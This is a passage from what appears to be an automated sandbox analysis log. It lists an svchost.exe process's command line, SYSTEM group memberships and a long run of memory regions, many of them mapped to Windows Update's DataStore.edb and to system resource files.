(hEvent=0x454) returned 1 [0263.331] GetLastError () returned 0x0 Thread: id = 128 os_tid = 0xecc [0144.478] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47a8d000" os_pid = "0x318" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xfcc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 298 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 299 start_va = 0xcb80000000 end_va = 0xcb800fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80000000" filename = "" Region: id = 300 start_va = 0xcb80100000 end_va = 0xcb801fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80100000" filename = "" Region: id = 301 start_va = 0xcb80200000 end_va = 0xcb80208fff entry_point = 0xcb80200000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 302 start_va = 0xcb80210000 end_va = 0xcb80210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80210000" filename = "" Region: id = 303 start_va = 0xcb80220000 end_va = 0xcb8029ffff entry_point = 0x0 region_type = private name = "private_0x000000cb80220000" filename = "" Region: id = 304 start_va = 0xcb802a0000 end_va = 0xcb802a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb802a0000" filename = "" Region: id = 305 start_va = 0xcb802b0000 end_va = 0xcb802b6fff entry_point = 0x0 region_type = private name = "private_0x000000cb802b0000" filename = "" Region: id = 306 start_va = 0xcb802c0000 end_va = 0xcb802c1fff entry_point = 0xcb802c0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 307 start_va = 0xcb802d0000 end_va = 0xcb802d4fff entry_point = 0xcb802d0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 308 start_va = 0xcb802e0000 end_va = 0xcb802effff entry_point = 0xcb802e0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 309 start_va = 0xcb802f0000 end_va = 0xcb802f2fff entry_point = 0xcb802f0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 310 start_va = 0xcb80300000 end_va = 0xcb803fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80300000" filename = "" Region: id = 311 start_va = 0xcb80400000 end_va = 0xcb804fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80400000" filename = "" Region: id = 312 start_va = 0xcb80500000 end_va = 0xcb805fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80500000" filename = "" Region: id = 313 start_va = 0xcb80600000 end_va = 0xcb806fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80600000" filename = "" Region: id = 314 start_va = 0xcb80700000 end_va = 0xcb807fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80700000" filename = "" Region: id = 315 start_va = 0xcb80800000 end_va = 0xcb808fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80800000" filename = "" Region: id = 316 start_va = 0xcb80900000 end_va = 0xcb809fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80900000" filename = "" Region: id = 317 start_va = 0xcb80a00000 end_va = 0xcb80afffff entry_point = 0x0 region_type = private name = "private_0x000000cb80a00000" filename = "" Region: id = 318 start_va = 0xcb80b00000 end_va = 0xcb80b00fff entry_point = 0x0 region_type = private name = "private_0x000000cb80b00000" filename = "" Region: id = 319 start_va = 0xcb80b10000 end_va = 0xcb80b10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80b10000" filename = "" Region: id = 320 start_va = 0xcb80b20000 end_va = 0xcb80b21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80b20000" filename = "" Region: id = 321 start_va = 0xcb80b30000 end_va = 0xcb80b31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80b30000" filename = "" Region: id = 322 start_va = 0xcb80b40000 end_va = 0xcb80b46fff entry_point = 0xcb80b40000 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 323 start_va = 0xcb80b50000 end_va = 0xcb80b56fff entry_point = 0x0 region_type = private name = "private_0x000000cb80b50000" filename = "" Region: id = 324 start_va = 0xcb80b60000 end_va = 0xcb80b66fff entry_point = 0x0 region_type = private name = "private_0x000000cb80b60000" filename = "" Region: id = 325 start_va = 0xcb80b70000 end_va = 0xcb80beffff entry_point = 0x0 region_type = private name = "private_0x000000cb80b70000" filename = "" Region: id = 326 start_va = 0xcb80bf0000 end_va = 0xcb80bf7fff entry_point = 0x0 region_type = private name = "private_0x000000cb80bf0000" filename = "" Region: id = 327 start_va = 0xcb80c00000 end_va = 0xcb80cfffff entry_point = 0x0 region_type = private name = "private_0x000000cb80c00000" filename = "" Region: id = 328 start_va = 0xcb80d00000 end_va = 0xcb80dfffff entry_point = 0x0 region_type = private name = "private_0x000000cb80d00000" filename = "" Region: id = 329 start_va = 0xcb80e00000 end_va = 0xcb80e0ffff entry_point = 0xcb80e00000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 330 start_va = 0xcb80e10000 end_va = 0xcb80e1ffff entry_point = 0xcb80e10000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 331 start_va = 0xcb80e20000 end_va = 0xcb80e2ffff entry_point = 0xcb80e20000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 332 start_va = 0xcb80e30000 end_va = 0xcb80e3ffff entry_point = 0xcb80e30000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 333 start_va = 0xcb80e40000 end_va = 0xcb80e4ffff entry_point = 0xcb80e40000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 334 start_va = 0xcb80e50000 end_va = 0xcb80e5ffff entry_point = 0xcb80e50000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 335 start_va = 0xcb80e60000 end_va = 0xcb80e6ffff entry_point = 0xcb80e60000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 336 start_va = 0xcb80e70000 end_va = 0xcb80e7ffff entry_point = 0xcb80e70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 337 start_va = 0xcb80e80000 end_va = 0xcb80e8ffff entry_point = 0xcb80e80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 338 start_va = 0xcb80e90000 end_va = 0xcb80e9ffff entry_point = 0xcb80e90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 339 start_va = 0xcb80ea0000 end_va = 0xcb80eaffff entry_point = 0xcb80ea0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 340 start_va = 0xcb80eb0000 end_va = 0xcb80ebffff entry_point = 0xcb80eb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 341 start_va = 0xcb80ec0000 end_va = 0xcb80ecffff entry_point = 0xcb80ec0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 342 start_va = 0xcb80ed0000 end_va = 0xcb80edffff entry_point = 0xcb80ed0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 343 start_va = 0xcb80ee0000 end_va = 0xcb80eeffff entry_point = 0xcb80ee0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 344 start_va = 0xcb80ef0000 end_va = 0xcb80efffff entry_point = 0xcb80ef0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 345 start_va = 0xcb80f00000 end_va = 0xcb80ffffff entry_point = 0x0 region_type = private name = "private_0x000000cb80f00000" filename = "" Region: id = 346 start_va = 0xcb81000000 end_va = 0xcb810fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81000000" filename = "" Region: id = 347 start_va = 0xcb81100000 end_va = 0xcb811fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81100000" filename = "" Region: id = 348 start_va = 0xcb81200000 end_va = 0xcb812fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81200000" filename = "" Region: id = 349 start_va = 0xcb81300000 end_va = 0xcb813fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81300000" filename = "" Region: id = 350 start_va = 0xcb81400000 end_va = 0xcb814fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81400000" filename = "" Region: id = 351 start_va = 0xcb81500000 end_va = 0xcb8157ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81500000" filename = "" Region: id = 352 start_va = 0xcb81580000 end_va = 0xcb81586fff entry_point = 0x0 region_type = private name = "private_0x000000cb81580000" filename = "" Region: id = 353 start_va = 0xcb81590000 end_va = 0xcb815d0fff entry_point = 0x0 region_type = private name = "private_0x000000cb81590000" filename = "" Region: id = 354 start_va = 0xcb815e0000 end_va = 0xcb8165ffff entry_point = 0x0 region_type = private name = "private_0x000000cb815e0000" filename = "" Region: id = 355 start_va = 0xcb81660000 end_va = 0xcb8166ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81660000" filename = "" Region: id = 356 start_va = 0xcb81670000 end_va = 0xcb8167ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81670000" filename = "" Region: id = 357 start_va = 0xcb81680000 end_va = 0xcb8177ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81680000" filename = "" Region: id = 358 start_va = 0xcb81780000 end_va = 0xcb81780fff entry_point = 0xcb81780000 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 359 start_va = 0xcb81790000 end_va = 0xcb8180ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81790000" filename = "" Region: id = 360 start_va = 0xcb81880000 end_va = 0xcb8197ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81880000" filename = "" Region: id = 361 start_va = 0xcb81980000 end_va = 0xcb81a7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81980000" filename = "" Region: id = 362 start_va = 0xcb81a80000 end_va = 0xcb81accfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb81a80000" filename = "" Region: id = 363 start_va = 0xcb81ad0000 end_va = 0xcb81ad6fff entry_point = 0x0 region_type = private name = "private_0x000000cb81ad0000" filename = "" Region: id = 364 start_va = 0xcb81ae0000 end_va = 0xcb81bdffff entry_point = 0x0 region_type = private name = "private_0x000000cb81ae0000" filename = "" Region: id = 365 start_va = 0xcb81be0000 end_va = 0xcb81cdffff entry_point = 0x0 region_type = private name = "private_0x000000cb81be0000" filename = "" Region: id = 366 start_va = 0xcb81ce0000 end_va = 0xcb81ddffff entry_point = 0x0 region_type = private name = "private_0x000000cb81ce0000" filename = "" Region: id = 367 start_va = 0xcb81de0000 end_va = 0xcb81edffff entry_point = 0x0 region_type = private name = "private_0x000000cb81de0000" filename = "" Region: id = 368 start_va = 0xcb81ee0000 end_va = 0xcb81ee0fff entry_point = 0x0 region_type = private name = "private_0x000000cb81ee0000" filename = "" Region: id = 369 start_va = 0xcb81ef0000 end_va = 0xcb81ef0fff entry_point = 0x0 region_type = private name = "private_0x000000cb81ef0000" filename = "" Region: id = 370 start_va = 0xcb81f00000 end_va = 0xcb81ffffff entry_point = 0x0 region_type = private name = "private_0x000000cb81f00000" filename = "" Region: id = 371 start_va = 0xcb82000000 end_va = 0xcb820fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82000000" filename = "" Region: id = 372 start_va = 0xcb82100000 end_va = 0xcb821fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82100000" filename = "" Region: id = 373 start_va = 0xcb82200000 end_va = 0xcb822fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82200000" filename = "" Region: id = 374 start_va = 0xcb82300000 end_va = 0xcb823fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82300000" filename = "" Region: id = 375 start_va = 0xcb82400000 end_va = 0xcb824fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82400000" filename = "" Region: id = 376 start_va = 0xcb82500000 end_va = 0xcb825fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82500000" filename = "" Region: id = 377 start_va = 0xcb82600000 end_va = 0xcb826fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82600000" filename = "" Region: id = 378 start_va = 0xcb82700000 end_va = 0xcb8270ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82700000" filename = "" Region: id = 379 start_va = 0xcb82710000 end_va = 0xcb8271ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82710000" filename = "" Region: id = 380 start_va = 0xcb82720000 end_va = 0xcb8272ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82720000" filename = "" Region: id = 381 start_va = 0xcb82730000 end_va = 0xcb8273ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82730000" filename = "" Region: id = 382 start_va = 0xcb82740000 end_va = 0xcb8274ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82740000" filename = "" Region: id = 383 start_va = 0xcb82750000 end_va = 0xcb8275ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82750000" filename = "" Region: id = 384 start_va = 0xcb82760000 end_va = 0xcb827dffff entry_point = 0x0 region_type = private name = "private_0x000000cb82760000" filename = "" Region: id = 385 start_va = 0xcb827e0000 end_va = 0xcb8282cfff entry_point = 0x0 region_type = private name = "private_0x000000cb827e0000" filename = "" Region: id = 386 start_va = 0xcb82830000 end_va = 0xcb8283ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82830000" filename = "" Region: id = 387 start_va = 0xcb82840000 end_va = 0xcb8284ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82840000" filename = "" Region: id = 388 start_va = 0xcb82850000 end_va = 0xcb8285ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82850000" filename = "" Region: id = 389 start_va = 0xcb82860000 end_va = 0xcb8286ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82860000" filename = "" Region: id = 390 start_va = 0xcb82870000 end_va = 0xcb8287ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82870000" filename = "" Region: id = 391 start_va = 0xcb82880000 end_va = 0xcb8288ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb82880000" filename = "" Region: id = 392 start_va = 0xcb82890000 end_va = 0xcb82893fff entry_point = 0x0 region_type = private name = "private_0x000000cb82890000" filename = "" Region: id = 393 start_va = 0xcb828a0000 end_va = 0xcb828a1fff entry_point = 0x0 region_type = private name = "private_0x000000cb828a0000" filename = "" Region: id = 394 start_va = 0xcb828b0000 end_va = 0xcb828b0fff entry_point = 0x0 region_type = private name = "private_0x000000cb828b0000" filename = "" Region: id = 395 start_va = 0xcb828c0000 end_va = 0xcb828cffff entry_point = 0x0 region_type = private name = "private_0x000000cb828c0000" filename = "" Region: id = 396 start_va = 0xcb828d0000 end_va = 0xcb828fffff entry_point = 0x0 region_type = private name = "private_0x000000cb828d0000" filename = "" Region: id = 397 start_va = 0xcb82900000 end_va = 0xcb829fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82900000" filename = "" Region: id = 398 start_va = 0xcb82a00000 end_va = 0xcb839fffff entry_point = 0x0 region_type = private name = "private_0x000000cb82a00000" filename = "" Region: id = 399 start_va = 0xcb83a00000 end_va = 0xcb879fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83a00000" filename = "" Region: id = 400 start_va = 0xcb87a00000 end_va = 0xcb8b9fffff entry_point = 0x0 region_type = private name = "private_0x000000cb87a00000" filename = "" Region: id = 401 start_va = 0xcb8ba00000 end_va = 0xcb8ba07fff entry_point = 0x0 region_type = private name = "private_0x000000cb8ba00000" filename = "" Region: id = 402 start_va = 0xcb8ba10000 end_va = 0xcb8bb0ffff entry_point = 0x0 region_type = private name = "private_0x000000cb8ba10000" filename = "" Region: id = 403 start_va = 0xcb8bb10000 end_va = 0xcb8bb8ffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bb10000" filename = "" Region: id = 404 start_va = 0xcb8bb90000 end_va = 0xcb8bb9ffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bb90000" filename = "" Region: id = 405 start_va = 0xcb8bba0000 end_va = 0xcb8bbaffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bba0000" filename = "" Region: id = 406 start_va = 0xcb8bbb0000 end_va = 0xcb8bbbffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bbb0000" filename = "" Region: id = 407 start_va = 0xcb8bbc0000 end_va = 0xcb8bbcffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bbc0000" filename = "" Region: id = 408 start_va = 0xcb8bbd0000 end_va = 0xcb8bbdffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bbd0000" filename = "" Region: id = 409 start_va = 0xcb8bbe0000 end_va = 0xcb8bbe7fff entry_point = 0x0 region_type = private name = "private_0x000000cb8bbe0000" filename = "" Region: id = 410 start_va = 0xcb8bbf0000 end_va = 0xcb8bbfffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bbf0000" filename = "" Region: id = 411 start_va = 0xcb8bc00000 end_va = 0xcb8bc00fff entry_point = 0xcb8bc00000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 412 start_va = 0xcb8bc10000 end_va = 0xcb8bc13fff entry_point = 0xcb8bc10000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 413 start_va = 0xcb8bc20000 end_va = 0xcb8bc37fff entry_point = 0x0 region_type = private name = "private_0x000000cb8bc20000" filename = "" Region: id = 414 start_va = 0xcb8bc50000 end_va = 0xcb8bc50fff entry_point = 0xcb8bc50000 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 415 start_va = 0xcb8bc60000 end_va = 0xcb8bc61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb8bc60000" filename = "" Region: id = 416 start_va = 0xcb8bc70000 end_va = 0xcb8bc7ffff entry_point = 0xcb8bc70000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 417 start_va = 0xcb8bc80000 end_va = 0xcb8bc8ffff entry_point = 0xcb8bc80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 418 start_va = 0xcb8bc90000 end_va = 0xcb8bc96fff entry_point = 0x0 region_type = private name = "private_0x000000cb8bc90000" filename = "" Region: id = 419 start_va = 0xcb8bca0000 end_va = 0xcb8bcaffff entry_point = 0xcb8bca0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 420 start_va = 0xcb8bcb0000 end_va = 0xcb8bcbffff entry_point = 0xcb8bcb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 421 start_va = 0xcb8bcc0000 end_va = 0xcb8bccffff entry_point = 0xcb8bcc0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 422 start_va = 0xcb8bcd0000 end_va = 0xcb8bcdffff entry_point = 0xcb8bcd0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 423 start_va = 0xcb8bce0000 end_va = 0xcb8bceffff entry_point = 0xcb8bce0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 424 start_va = 0xcb8bcf0000 end_va = 0xcb8bcfffff entry_point = 0xcb8bcf0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 425 start_va = 0xcb8bd00000 end_va = 0xcb8bdfffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bd00000" filename = "" Region: id = 426 start_va = 0xcb8be00000 end_va = 0xcb8befffff entry_point = 0x0 region_type = private name = "private_0x000000cb8be00000" filename = "" Region: id = 427 start_va = 0xcb8bf00000 end_va = 0xcb8bffffff entry_point = 0x0 region_type = private name = "private_0x000000cb8bf00000" filename = "" Region: id = 428 start_va = 0xcb8c000000 end_va = 0xcb8c0fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c000000" filename = "" Region: id = 429 start_va = 0xcb8c100000 end_va = 0xcb8c1fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c100000" filename = "" Region: id = 430 start_va = 0xcb8c200000 end_va = 0xcb8c2fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c200000" filename = "" Region: id = 431 start_va = 0xcb8c300000 end_va = 0xcb8c3fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c300000" filename = "" Region: id = 432 start_va = 0xcb8c400000 end_va = 0xcb8c4fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c400000" filename = "" Region: id = 433 start_va = 0xcb8c500000 end_va = 0xcb8c5fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c500000" filename = "" Region: id = 434 start_va = 0xcb8c600000 end_va = 0xcb8c60ffff entry_point = 0xcb8c600000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 435 start_va = 0xcb8c610000 end_va = 0xcb8c61ffff entry_point = 0xcb8c610000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 436 start_va = 0xcb8c620000 end_va = 0xcb8c62ffff entry_point = 0xcb8c620000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 437 start_va = 0xcb8c630000 end_va = 0xcb8c63ffff entry_point = 0xcb8c630000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 438 start_va = 0xcb8c640000 end_va = 0xcb8c64ffff entry_point = 0xcb8c640000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 439 start_va = 0xcb8c650000 end_va = 0xcb8c65ffff entry_point = 0xcb8c650000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 440 start_va = 0xcb8c660000 end_va = 0xcb8c66ffff entry_point = 0xcb8c660000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 441 start_va = 0xcb8c670000 end_va = 0xcb8c67ffff entry_point = 0xcb8c670000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 442 start_va = 0xcb8c680000 end_va = 0xcb8c68ffff entry_point = 0xcb8c680000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 443 start_va = 0xcb8c690000 end_va = 0xcb8c69ffff entry_point = 0xcb8c690000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 444 start_va = 0xcb8c6a0000 end_va = 0xcb8c6affff entry_point = 0xcb8c6a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: 